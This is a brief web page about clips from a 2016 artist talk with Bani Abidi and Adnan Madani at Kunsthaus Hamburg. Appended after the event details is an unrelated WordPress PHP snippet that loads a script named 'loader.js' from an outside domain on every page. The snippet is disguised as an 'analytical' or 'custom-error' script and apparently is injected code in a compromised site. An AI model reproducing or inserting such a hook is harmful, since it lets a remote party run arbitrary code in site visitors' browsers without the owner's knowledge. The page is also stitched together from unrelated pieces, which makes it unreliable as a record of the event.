DELIMINATION AND CONTROL
Clips from the artist talk with Bani Abidi and Adnan Madani moderated by Katja Schroeder
Kunsthaus Hamburg, 30 October 2016
// analytical function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script');

